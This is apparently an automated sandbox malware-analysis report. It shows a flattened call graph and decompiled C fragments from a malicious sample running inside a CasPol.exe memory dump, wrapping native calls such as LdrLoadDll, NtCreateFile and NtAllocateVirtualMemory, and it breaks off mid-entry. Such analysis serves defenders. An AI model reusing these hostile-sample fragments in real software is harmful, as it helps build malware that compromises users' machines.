LdrLoadDll 16810->16811 16812 41e85f RtlAllocateHeap 16811->16812 16812->16809 16814 41e843 2 API calls 16813->16814 16815 42020b 16813->16815 16814->16815 16815->16726 16817 41f1e3 LdrLoadDll 16816->16817 16818 41e63f NtReadFile 16817->16818 16818->16729 16820 41ff20 16819->16820 16821 41ff37 16819->16821 16820->16821 16822 4201f3 2 API calls 16820->16822 16821->16740 16823 41ff4e 16822->16823 16823->16740 16825 41f1e3 LdrLoadDll 16824->16825 16826 41e4cf 16825->16826 16826->16731 16828 41e1ef 16827->16828 16829 41f1e3 LdrLoadDll 16827->16829 16837 12699a0 LdrInitializeThunk 16828->16837 16829->16828 16830 41e212 16830->16747 16833 41f1e3 LdrLoadDll 16832->16833 16834 41e23f 16833->16834 16838 1269780 LdrInitializeThunk 16834->16838 16835 418dfc 16835->16755 16837->16830 16838->16835 16840 41f1e3 LdrLoadDll 16839->16840 16841 418f68 16840->16841 16841->16781 16843 4200c0 16842->16843 16977 41e753 16842->16977 16843->16662 16846 4187b4 16845->16846 16847 4187bc 16845->16847 16846->16664 16876 418a8f 16847->16876 16980 421293 16847->16980 16849 418810 16850 421293 2 API calls 16849->16850 16853 41881b 16850->16853 16851 418869 16854 421293 2 API calls 16851->16854 16853->16851 16855 4213c3 3 API calls 16853->16855 16991 421333 16853->16991 16857 41887d 16854->16857 16855->16853 16856 4188da 16858 421293 2 API calls 16856->16858 16857->16856 16985 4213c3 16857->16985 16860 4188f0 16858->16860 16861 41892d 16860->16861 16864 4213c3 3 API calls 16860->16864 16862 421293 2 API calls 16861->16862 16863 418938 16862->16863 16865 4213c3 3 API calls 16863->16865 16868 418972 16863->16868 16864->16860 16865->16863 16997 4212f3 16868->16997 16869 4212f3 2 API calls 16870 418a71 16869->16870 16871 4212f3 2 API calls 16870->16871 16872 418a7b 16871->16872 16873 4212f3 2 API calls 16872->16873 16874 418a85 16873->16874 16875 4212f3 2 API calls 16874->16875 16875->16876 16876->16664 16878 419b14 16877->16878 16879 4191a3 8 API calls 16878->16879 16884 419b2a 16879->16884 16880 419b33 16880->16668 16881 419b6a 16882 420113 2 API calls 16881->16882 16883 419b7b 16882->16883 16883->16668 16884->16880 16884->16881 16885 419bb6 16884->16885 16886 420113 2 API calls 16885->16886 16887 419bbb 16886->16887 16887->16668 17000 41ee63 16888->17000 16890 41efe7 16891 41ee63 LdrLoadDll 16890->16891 16892 41eff0 16891->16892 16893 41ee63 LdrLoadDll 16892->16893 16894 41eff9 16893->16894 16895 41ee63 LdrLoadDll 16894->16895 16896 41f002 16895->16896 16897 41ee63 LdrLoadDll 16896->16897 16898 41f00b 16897->16898 16899 41ee63 LdrLoadDll 16898->16899 16900 41f014 16899->16900 16901 41ee63 LdrLoadDll 16900->16901 16902 41f020 16901->16902 16903 41ee63 LdrLoadDll 16902->16903 16904 41f029 16903->16904 16905 41ee63 LdrLoadDll 16904->16905 16906 41f032 16905->16906 16907 41ee63 LdrLoadDll 16906->16907 16908 41f03b 16907->16908 16909 41ee63 LdrLoadDll 16908->16909 16910 41f044 16909->16910 16911 41ee63 LdrLoadDll 16910->16911 16912 41f04d 16911->16912 16913 41ee63 LdrLoadDll 16912->16913 16914 41f059 16913->16914 16915 41ee63 LdrLoadDll 16914->16915 16916 41f062 16915->16916 16917 41ee63 LdrLoadDll 16916->16917 16918 41f06b 16917->16918 16919 41ee63 LdrLoadDll 16918->16919 16920 41f074 16919->16920 16921 41ee63 LdrLoadDll 16920->16921 16922 41f07d 16921->16922 16923 41ee63 LdrLoadDll 16922->16923 16924 41f086 16923->16924 16925 41ee63 LdrLoadDll 16924->16925 16926 41f092 16925->16926 16927 41ee63 LdrLoadDll 16926->16927 16928 41f09b 16927->16928 16929 41ee63 LdrLoadDll 16928->16929 16930 41f0a4 16929->16930 16931 41ee63 LdrLoadDll 16930->16931 16932 41f0ad 16931->16932 16933 41ee63 LdrLoadDll 16932->16933 16934 41f0b6 16933->16934 16935 41ee63 LdrLoadDll 16934->16935 16936 41f0bf 16935->16936 16937 41ee63 LdrLoadDll 16936->16937 16938 41f0cb 16937->16938 16939 41ee63 LdrLoadDll 16938->16939 16940 41f0d4 16939->16940 16941 41ee63 LdrLoadDll 16940->16941 16942 41f0dd 16941->16942 16943 41ee63 LdrLoadDll 16942->16943 16944 41f0e6 16943->16944 16945 41ee63 LdrLoadDll 16944->16945 16946 41f0ef 16945->16946 16947 41ee63 LdrLoadDll 16946->16947 16948 41f0f8 16947->16948 16949 41ee63 LdrLoadDll 16948->16949 16950 41f104 16949->16950 16951 41ee63 LdrLoadDll 16950->16951 16952 41f10d 16951->16952 16953 41ee63 LdrLoadDll 16952->16953 16954 41f116 16953->16954 16955 41ee63 LdrLoadDll 16954->16955 16956 41f11f 16955->16956 16957 41ee63 LdrLoadDll 16956->16957 16958 41f128 16957->16958 16959 41ee63 LdrLoadDll 16958->16959 16960 41f131 16959->16960 16961 41ee63 LdrLoadDll 16960->16961 16962 41f13d 16961->16962 16963 41ee63 LdrLoadDll 16962->16963 16964 41f146 16963->16964 16965 41ee63 LdrLoadDll 16964->16965 16966 41f14f 16965->16966 16966->16672 16968 41f1e3 LdrLoadDll 16967->16968 16969 41e0ef 16968->16969 17006 1269860 LdrInitializeThunk 16969->17006 16970 41e106 16970->16674 16974 41f175 16972->16974 16973 41f184 16973->16669 16974->16973 17007 41e6d3 16974->17007 16978 41f1e3 LdrLoadDll 16977->16978 16979 41e76f NtAllocateVirtualMemory 16978->16979 16979->16843 16981 4212a3 16980->16981 16982 4212a9 16980->16982 16981->16849 16983 4201f3 2 API calls 16982->16983 16984 4212cf 16983->16984 16984->16849 16986 421333 16985->16986 16987 421390 16986->16987 16988 4201f3 2 API calls 16986->16988 16987->16857 16989 42136d 16988->16989 16990 420113 2 API calls 16989->16990 16990->16987 16992 421358 16991->16992 16993 421390 16991->16993 16994 4201f3 2 API calls 16992->16994 16993->16853 16995 42136d 16994->16995 16996 420113 2 API calls 16995->16996 16996->16993 16998 418a67 16997->16998 16999 420113 2 API calls 16997->16999 16998->16869 16999->16998 17001 41ee7e 17000->17001 17002 4195b3 LdrLoadDll 17001->17002 17003 41ee9e 17002->17003 17004 4195b3 LdrLoadDll 17003->17004 17005 41ef52 17003->17005 17004->17005 17005->16890 17005->17005 17006->16970 17008 41e6ef 17007->17008 17009 41f1e3 LdrLoadDll 17007->17009 17008->16669 17009->17008 17011 1269681 17010->17011 17012 126968f LdrInitializeThunk 17010->17012 17011->16678 17012->16678 17014 41f1e3 LdrLoadDll 17013->17014 17015 41e89f RtlFreeHeap 17014->17015 17015->16681 17017 409483 17016->17017 17018 40947e 17016->17018 17019 420093 2 API calls 17017->17019 17018->16573 17022 4094a8 17019->17022 17020 40950b 17020->16573 17021 41e0d3 2 API calls 17021->17022 17022->17020 17022->17021 17023 409511 17022->17023 17027 420093 2 API calls 17022->17027 17032 41e7d3 17022->17032 17025 409537 17023->17025 17026 41e7d3 2 API calls 17023->17026 17025->16573 17028 409528 17026->17028 17027->17022 17028->16573 17030 409751 17029->17030 17031 41e7d3 2 API calls 17029->17031 17030->16530 17031->17030 17033 41f1e3 LdrLoadDll 17032->17033 17034 41e7ef 17033->17034 17037 12696e0 LdrInitializeThunk 17034->17037 17035 41e806 17035->17022 17037->17035 17039 40d1a7 17038->17039 17042 41dea3 17039->17042 17041 40d1e1 17041->16579 17043 41debf 17042->17043 17044 41f1e3 LdrLoadDll 17042->17044 17043->17041 17044->17043 17046 41f876 17045->17046 17047 40cf63 LdrLoadDll 17046->17047 17048 40be00 17047->17048 17048->16536 17050 40d2d6 17049->17050 17051 41dea3 LdrLoadDll 17050->17051 17052 40d353 17050->17052 17051->17052 17052->16543 17054 41f1e3 LdrLoadDll 17053->17054 17055 40fefe 17054->17055 17055->16551 17056 41e9e3 17055->17056 17057 41f1e3 LdrLoadDll 17056->17057 17058 41ea02 LookupPrivilegeValueW 17057->17058 17058->16547 17060 41e48f 17059->17060 17061 41f1e3 LdrLoadDll 17059->17061 17064 1269910 LdrInitializeThunk 17060->17064 17061->17060 17062 41e4ae 17062->16550 17064->17062 17066 40d45a 17065->17066 17067 40d2b3 LdrLoadDll 17066->17067 17068 40d4bd 17067->17068 17068->16500 17070 40ffed 17069->17070 17078 4100a3 17069->17078 17071 40d2b3 LdrLoadDll 17070->17071 17072 41000f 17071->17072 17079 41e153 17072->17079 17074 410051 17082 41e193 17074->17082 17077 41e6a3 2 API calls 17077->17078 17078->16503 17078->16504 17080 41f1e3 LdrLoadDll 17079->17080 17081 41e16f 17080->17081 17081->17074 17083 41f1e3 LdrLoadDll 17082->17083 17084 41e1af 17083->17084 17087 1269fe0 LdrInitializeThunk 17084->17087 17085 410097 17085->17077 17087->17085 17089 40ddee 17088->17089 17090 40d433 LdrLoadDll 17089->17090 17091 40de45 17090->17091 17124 40d0b3 17091->17124 17093 40e0bc 17093->16517 17094 40de6b 17094->17093 17133 418ad3 17094->17133 17096 40deb0 17096->17093 17136 40a0a3 17096->17136 17098 40def4 17098->17093 17158 41e713 17098->17158 17102 40df4a 17103 40df51 17102->17103 17105 41e223 2 API calls 17102->17105 17104 420113 2 API calls 17103->17104 17106 40df5e 17104->17106 17107 40df8e 17105->17107 17106->16517 17108 40df9b 17107->17108 17111 40dfab 17107->17111 17109 420113 2 API calls 17108->17109 17110 40dfa2 17109->17110 17110->16517 17112 410193 3 API calls 17111->17112 17113 40e01f 17112->17113 17113->17103 17114 40e02a 17113->17114 17115 420113 2 API calls 17114->17115 17116 40e04e 17115->17116 17170 41e273 17116->17170 17119 41e223 2 API calls 17120 40e089 17119->17120 17120->17093 17175 41e033 17120->17175 17123 41e8c3 2 API calls 17123->17093 17125 40d0c0 17124->17125 17126 40d0c4 17124->17126 17125->17094 17127 40d10f 17126->17127 17129 40d0dd 17126->17129 17128 41dee3 LdrLoadDll 17127->17128 17130 40d120 17128->17130 17180 41dee3 17129->17180 17130->17094 17134 410193 3 API calls 17133->17134 17135 418af9 17134->17135 17135->17096 17183 40a2d3 17136->17183 17138 40a2c9 17138->17098 17139 40a0c1 17139->17138 17140 409473 4 API calls 17139->17140 17141 40a19f 17139->17141 17151 40a0ff 17140->17151 17141->17138 17142 40a27f 17141->17142 17143 409473 4 API calls 17141->17143 17142->17138 17230 410403 17142->17230 17155 40a1dc 17143->17155 17146 410403 10 API calls 17147 40a2a9 17146->17147 17147->17138 17148 410403 10 API calls 17147->17148 17149 40a2bf 17148->17149 17149->17098 17151->17141 17152 40a195 17151->17152 17197 409d83 17151->17197 17153 409733 2 API calls 17152->17153 17153->17141 17154 409d83 14 API calls 17154->17155 17155->17142 17155->17154 17156 40a275 17155->17156 17157 409733 2 API calls 17156->17157 17157->17142 17159 41f1e3 LdrLoadDll 17158->17159 17160 41e72f 17159->17160 17349 12698f0 LdrInitializeThunk 17160->17349 17161 40df2b 17163 410193 17161->17163 17164 4101b0 17163->17164 17165 41e1d3 2 API calls 17164->17165 17166 4101f1 17165->17166 17167 4101f8 17166->17167 17168 41e223 2 API calls 17166->17168 17167->17102 17169 410221 17168->17169 17169->17102 17171 41f1e3 LdrLoadDll 17170->17171 17172 41e28f 17171->17172 17350 12697a0 LdrInitializeThunk 17172->17350 17173 40e062 17173->17119 17176 41f1e3 LdrLoadDll 17175->17176 17177 41e04f 17176->17177 17351 1269a20 LdrInitializeThunk 17177->17351 17178 40e0b5 17178->17123 17181 41f1e3 LdrLoadDll 17180->17181 17182 40d0ff 17181->17182 17182->17094 17184 40a2fa 17183->17184 17185 409473 4 API calls 17184->17185 17192 40a55f 17184->17192 17186 40a34d 17185->17186 17187 409733 2 API calls 17186->17187 17186->17192 17188 40a3dc 17187->17188 17189 409473 4 API calls 17188->17189 17188->17192 17190 40a3f1 17189->17190 17191 409733 2 API calls 17190->17191 17190->17192 17195 40a451 17191->17195 17192->17139 17193 409473 4 API calls 17193->17195 17194 409d83 14 API calls 17194->17195 17195->17192 17195->17193 17195->17194 17196 409733 2 API calls 17195->17196 17196->17195 17198 409da8 17197->17198 17238 41df23 17198->17238 17201 409dfc 17201->17151 17202 409e7d 17271 4102e3 17202->17271 17203 41e113 2 API calls 17204 409e20 17203->17204 17204->17202 17206 409e2b 17204->17206 17213 409ea9 17206->17213 17241 40e0d3 17206->17241 17207 409e98 17209 409e9f 17207->17209 17211 409eb5 17207->17211 17210 41e6a3 2 API calls 17209->17210 17210->17213 17279 41dfa3 17211->17279 17212 409e45 17212->17213 17261 409bb3 17212->17261 17213->17151 17217 40e0d3 5 API calls 17219 409f00 17217->17219 17219->17213 17282 41dfd3 17219->17282 17224 41e033 2 API calls 17225 409f4e 17224->17225 17226 41e6a3 2 API calls 17225->17226 17227 409f58 17226->17227 17289 409983 17227->17289 17229 409f6c 17229->17151 17231 410428 17230->17231 17232 409773 8 API calls 17231->17232 17233 41044c 17232->17233 17234 40a293 17233->17234 17235 4191a3 8 API calls 17233->17235 17237 420113 2 API calls 17233->17237 17336 410243 17233->17336 17234->17138 17234->17146 17235->17233 17237->17233 17239 409df2 17238->17239 17240 41f1e3 LdrLoadDll 17238->17240 17239->17201 17239->17202 17239->17203 17240->17239 17242 40e101 17241->17242 17243 410193 3 API calls 17242->17243 17244 40e163 17243->17244 17245 40e1ac 17244->17245 17246 41e223 2 API calls 17244->17246 17245->17212 17247 40e18e 17246->17247 17248 40e198 17247->17248 17251 40e1b8 17247->17251 17249 41e273 2 API calls 17248->17249 17250 40e1a2 17249->17250 17252 41e6a3 2 API calls 17250->17252 17253 40e242 17251->17253 17254 40e225 17251->17254 17252->17245 17256 41e273 2 API calls 17253->17256 17255 41e6a3 2 API calls 17254->17255 17258 40e22f 17255->17258 17257 40e251 17256->17257 17259 41e6a3 2 API calls 17257->17259 17258->17212 17260 40e25b 17259->17260 17260->17212 17262 409bc9 17261->17262 17267 409d54 17262->17267 17305 409773 17262->17305 17264 409cc8 17265 409983 11 API calls 17264->17265 17264->17267 17266 409cf6 17265->17266 17266->17267 17268 41e113 2 API calls 17266->17268 17267->17151 17269 409d2b 17268->17269 17269->17267 17270 41e713 2 API calls 17269->17270 17270->17267 17312 41df63 17271->17312 17276 410354 17276->17207 17277 41e6a3 2 API calls 17278 410348 17277->17278 17278->17207 17280 409ee0 17279->17280 17281 41f1e3 LdrLoadDll 17279->17281 17280->17217 17281->17280 17283 41dfd6 17282->17283 17284 41f1e3 LdrLoadDll 17283->17284 17285 409f25 17284->17285 17286 41e063 17285->17286 17287 41f1e3 LdrLoadDll 17286->17287 17288 409f3f 17287->17288 17288->17224 17290 4099ac 17289->17290 17318 4098e3 17290->17318 17293 41e713 2 API calls 17294 4099bf 17293->17294 17294->17293 17295 409a4a 17294->17295 17297 409a45 17294->17297 17326 410363 17294->17326 17295->17229 17296 41e6a3 2 API calls 17298 409a7d 17296->17298 17297->17296 17298->17295 17299 41df23 LdrLoadDll 17298->17299 17300 409ae2 17299->17300 17300->17295 17301 41df63 LdrLoadDll 17300->17301 17302 409b46 17301->17302 17302->17295 17303 4191a3 8 API calls 17302->17303 17304 409b9b 17303->17304 17304->17229 17306 409872 17305->17306 17307 409788 17305->17307 17306->17264 17307->17306 17308 4191a3 8 API calls 17307->17308 17309 4097f5 17308->17309 17310 420113 2 API calls 17309->17310 17311 40981c 17309->17311 17310->17311 17311->17264 17313 41f1e3 LdrLoadDll 17312->17313 17314 410327 17313->17314 17314->17278 17315 41e003 17314->17315 17316 41f1e3 LdrLoadDll 17315->17316 17317 410338 17316->17317 17317->17276 17317->17277 17319 4098fd 17318->17319 17320 40cf63 LdrLoadDll 17319->17320 17321 409918 17320->17321 17322 4195b3 LdrLoadDll 17321->17322 17323 409930 17322->17323 17324 40994c 17323->17324 17325 409939 PostThreadMessageW 17323->17325 17324->17294 17325->17324 17327 410376 17326->17327 17330 41e0a3 17327->17330 17331 41f1e3 LdrLoadDll 17330->17331 17332 41e0bf 17331->17332 17335 1269840 LdrInitializeThunk 17332->17335 17333 4103a1 17333->17294 17335->17333 17337 410254 17336->17337 17345 41e8f3 17337->17345 17340 41029b 17340->17233 17341 41e113 2 API calls 17342 4102b2 17341->17342 17342->17340 17343 41e713 2 API calls 17342->17343 17344 4102d1 17343->17344 17344->17233 17346 41e8f9 17345->17346 17347 41f1e3 LdrLoadDll 17346->17347 17348 410294 17347->17348 17348->17340 17348->17341 17349->17161 17350->17173 17351->17178 17352 4200d3 17355 41e793 17352->17355 17356 41f1e3 LdrLoadDll 17355->17356 17357 41e7af 17356->17357 17360 1269a00 LdrInitializeThunk 17357->17360 17358 41e7ca 17360->17358 17361 40b523 17362 40b548 17361->17362 17363 40cf63 LdrLoadDll 17362->17363 17364 40b57b 17363->17364 17366 40b5a0 17364->17366 17367 40eb23 17364->17367 17368 40eb4f 17367->17368 17369 41e3f3 LdrLoadDll 17368->17369 17370 40eb68 17369->17370 17371 40eb6f 17370->17371 17378 41e433 17370->17378 17371->17366 17375 40ebaa 17376 41e6a3 2 API calls 17375->17376 17377 40ebcd 17376->17377 17377->17366 17379 41e44f 17378->17379 17380 41f1e3 LdrLoadDll 17378->17380 17386 1269710 LdrInitializeThunk 17379->17386 17380->17379 17381 40eb92 17381->17371 17383 41ea23 17381->17383 17384 41f1e3 LdrLoadDll 17383->17384 17385 41ea42 17384->17385 17385->17375 17386->17381 17387 1244120 17393 124416e 17387->17393 17388 128e158 GetPEB 17388->17393 17389 1244413 17390 128e2a2 GetPEB 17396 128e2b4 17390->17396 17391 128e148 GetPEB 17391->17388 17392 1244405 17391->17392 17392->17389 17392->17390 17393->17388 17393->17391 17393->17392 17394 12444bb 17393->17394 17397 12442a3 17393->17397 17399 12441da 17393->17399 17395 1244292 GetPEB 17395->17397 17397->17392 17402 12695d0 LdrInitializeThunk 17397->17402 17398 128e1f3 17399->17392 17399->17395 17399->17397 17399->17398 17401 128e282 GetPEB 17401->17392 17402->17401 17404 1269540 LdrInitializeThunk

                                                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                                                            Function 0040CF63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 106 40cf63-40cf7f 107 40cf87-40cf8c 106->107 108 40cf82 call 420eb3 106->108 109 40cf92-40cfa0 call 4213d3 107->109 110 40cf8e-40cf91 107->110 108->107 113 40cfb0-40cfc1 call 41f753 109->113 114 40cfa2-40cfad call 421653 109->114 119 40cfc3-40cfd7 LdrLoadDll 113->119 120 40cfda-40cfdd 113->120 114->113 119->120
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0040CF63(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420EB3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213D3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421653( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F753(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                                                                                                                                                                                            0x0040cf7f
                                                                                                                                                                                                                                                                                                                            0x0040cf82
                                                                                                                                                                                                                                                                                                                            0x0040cf87
                                                                                                                                                                                                                                                                                                                            0x0040cf8c
                                                                                                                                                                                                                                                                                                                            0x0040cf96
                                                                                                                                                                                                                                                                                                                            0x0040cf9b
                                                                                                                                                                                                                                                                                                                            0x0040cf9e
                                                                                                                                                                                                                                                                                                                            0x0040cfa0
                                                                                                                                                                                                                                                                                                                            0x0040cfa8
                                                                                                                                                                                                                                                                                                                            0x0040cfad
                                                                                                                                                                                                                                                                                                                            0x0040cfad
                                                                                                                                                                                                                                                                                                                            0x0040cfb4
                                                                                                                                                                                                                                                                                                                            0x0040cfbc
                                                                                                                                                                                                                                                                                                                            0x0040cfbf
                                                                                                                                                                                                                                                                                                                            0x0040cfc1
                                                                                                                                                                                                                                                                                                                            0x0040cfd5
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040cfd7
                                                                                                                                                                                                                                                                                                                            0x0040cfdd
                                                                                                                                                                                                                                                                                                                            0x0040cf91
                                                                                                                                                                                                                                                                                                                            0x0040cf91
                                                                                                                                                                                                                                                                                                                            0x0040cf91

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFD5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ce3e21bcb2f0c99f266a038cf30227417afd4a146aa06ba6ae79da7fdaa82e0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A70152B1E0020EBBDF10DBE1DC82F9EB3799B14308F0081A6E908A7280F634EB448755
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E573 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 121 41e573-41e5c4 call 41f1e3 NtCreateFile
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E573(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e582
                                                                                                                                                                                                                                                                                                                            0x0041e58a
                                                                                                                                                                                                                                                                                                                            0x0041e5c0
                                                                                                                                                                                                                                                                                                                            0x0041e5c4

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5C0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c4b05fca361b6880d617bafb059ff989149384fefbd596c0f21ef93711f16497
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018208BA0997241C630E851CBA4
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E623 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 124 41e623-41e66c call 41f1e3 NtReadFile
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E668
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f58dbc5a0349191144f6ca73e2ffd5e48adb6bcb5862f6519cebdea97ccf39e4
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0F0AFB2204208ABCB14DF99DC85EEB77ADAF8C754F118259BA0DA7241D630E911CBA5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E753 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 127 41e753-41e790 call 41f1e3 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E753(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x404043
				E0041F1E3( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e756
                                                                                                                                                                                                                                                                                                                            0x0041e759
                                                                                                                                                                                                                                                                                                                            0x0041e762
                                                                                                                                                                                                                                                                                                                            0x0041e76a
                                                                                                                                                                                                                                                                                                                            0x0041e78c
                                                                                                                                                                                                                                                                                                                            0x0041e790

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035B7,00000004,00001000,00000000), ref: 0041E78C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
